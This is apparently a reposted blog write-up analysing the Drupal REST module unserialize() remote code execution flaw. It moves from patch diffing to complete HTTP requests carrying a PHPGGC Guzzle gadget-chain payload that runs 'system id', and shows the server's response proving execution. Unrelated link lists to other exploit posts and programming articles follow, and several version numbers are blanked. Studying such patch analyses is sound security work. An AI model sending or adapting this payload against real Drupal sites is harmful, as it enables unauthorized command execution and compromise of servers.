Analyzing the patch

By diffing Drupal 8.6. and 8.6., we can see that in the REST module, FieldItemNormalizer now uses a new trait, SerializedColumnNormalizerTrait. This trait provides the checkForSerializedStrings() method, which in short raises an exception if a string is provided for a value that is stored as a serialized string. This indicates the exploitation vector fairly clearly: through a REST request, the attacker needs to send a serialized property. This property will later be unserialize()d, thing that can easily be exploited using tools such as PHPGGC. Another modified file gives indications as to which property can be used: LinkItem now uses unserialize($values['options'], ['allowed_classes' => FALSE]); instead of the standard unserialize($values['options']);.

As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link.

Triggering the unserialize()

Having all these elements in mind, triggering an unserialize is fairly easy:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "<SERIALIZED_CONTENT>"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

Since Drupal  uses Guzzle, we can generate a payload using PHPGGC:

$ ./phpggc guzzle/rce1 system id --json

"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

We can now send the payload via GET:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

To which Drupal responds:

HTTP/1.1  OK

Link: <...>

X-Generator: Drupal  (https://www.drupal.org)

X-Drupal-Cache: MISS

Connection: close

Content-Type: application/hal+json

Content-Length: 

{...}uid=(www-data) gid=(www-data) groups=(www-data)

Note: Drupal caches responses: if you're in a testing environment, clear the cache. If not, try another node ID.

[EXP]Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution的更多相关文章

  1. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  2. [EXP]Microsoft Windows CONTACT - Remote Code Execution

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...

  3. [EXP]WordPress Core 5.0 - Remote Code Execution

    var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ...

  4. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  5. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  6. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  7. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  8. GTAC 2015将于11月10号和11号召开

    今年的GTAC注册已经结束,将会在11月10号和11号在Google马萨诸塞州剑桥办公室召开.大家可以关注https://developers.google.com/google-test-autom ...

  9. 【译】C++工程师需要掌握的10个C++11特性

    原文标题:Ten C++11 Features Every C++ Developer Should Use 原文作者:Marius Bancila 原文地址:codeproject 备注:非直译,带 ...

随机推荐

  1. CentOS 特殊变量($0、$1、$2、 $?、 $# 、$@、 $*)

    名称 说明 $0 脚本名称 $1-9 脚本执行时的参数1到参数9 $? 脚本的返回值 $# 脚本执行时,输入的参数的个数 $@ 输入的参数的具体内容(将输入的参数作为一个多个对象,即是所有参数的一个列 ...

  2. Codeforces Round #499 (Div. 2)

    Codeforces Round #499 (Div. 2) https://codeforces.com/contest/1011 A #include <bits/stdc++.h> ...

  3. Centos7编译安装lnmp(nginx1.10 php7.0.2)

    我使用的是阿里云的服务器 Centos7 64位的版本 1. 连接服务器 这个是Xshell5的版本 安装好之后我们开始连接服务器 2. 安装nginx 首先安装nginx的依赖 yum instal ...

  4. jsonarray根据id排序

    List<JSONObject> jsonValue=new ArrayList<JSONObject>(); JSONArray sortJsonarr=new JSONAr ...

  5. 6M - 循环多少次?

    我们知道,在编程中,我们时常需要考虑到时间复杂度,特别是对于循环的部分.例如, 如果代码中出现 for(i=1;i<=n;i++) OP ; 那么做了n次OP运算,如果代码中出现 fori=1; ...

  6. org.apache.hadoop.security.AccessControlException

    在hdfs集群上,需要向Hdfs写入文件,控制台会输出以下错误信息: Caused by: org.apache.hadoop.ipc.RemoteException(org.apache.hadoo ...

  7. Maven学习 二 Maven环境搭建

    第一步:下载Maven并解压 注意选择镜像地址,选择国内的会快点 解压目录 Maven目录分析 bin:含有mvn运行的脚本 boot:含有plexus-classworlds类加载器框架 conf: ...

  8. 数据库-mysql命令

    1.项目过程:概要设计阶段 —— 架构师 任务:技术选型(网络/语言/框架).项目结构(子系统/模块).数据结构(数据特点/内容) 项目中存储数据的方式: (1)服务器内存:存取速度快:非永久存储.容 ...

  9. Codeforces Round #547 (Div. 3) G 贪心

    https://codeforces.com/contest/1141/problem/G 题意 在一棵有n个点的树上给边染色,连在同一个点上的边颜色不能相同,除非舍弃掉这个点,问最少需要多少种颜色来 ...

  10. HTML中的table导出为Excel文件

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...